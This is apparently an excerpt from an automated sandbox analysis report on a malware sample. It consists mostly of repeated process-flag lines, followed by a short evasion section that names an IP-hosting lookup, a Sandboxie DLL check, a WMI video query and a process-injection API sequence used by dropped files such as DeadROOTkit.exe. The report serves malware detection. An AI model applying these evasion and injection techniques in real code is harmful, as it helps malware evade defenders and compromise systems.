Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Deadsvchost.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
Source: C:\Windows\System32\dllhost.exe Code function: OpenProcess,IsWow64Process,CloseHandle,OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,VirtualFreeEx,CloseHandle,CloseHandle, 6_2_0000000140001854
Source: C:\Users\Public\DeadXClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: DeadROOTkit.exe, 00000002.00000002.2956134718.0000000002311000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: mIURiU8n2P.exe, 00000000.00000002.1703934967.00000000027B1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000002.00000000.1701692705.00000000001A2000.00000002.00000001.01000000.00000008.sdmp, DeadROOTkit.exe.2.dr Binary or memory string: SBIEDLL.DLLINFO
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\mIURiU8n2P.exe Memory allocated: 1A780000 memory reserve | memory write watch
Source: C:\Users\Public\DeadXClient.exe Memory allocated: EC0000 memory reserve | memory write watch
Source: C:\Users\Public\DeadXClient.exe Memory allocated: 1A900000 memory reserve | memory write watch
Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 8D0000 memory reserve | memory write watch
Source: C:\Users\Public\DeadROOTkit.exe Memory allocated: 1A310000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 10C0000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1AD40000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: A20000 memory reserve | memory write watch
Source: C:\Users\Public\Deadsvchost.exe Memory allocated: 1A4A0000 memory reserve | memory write watch
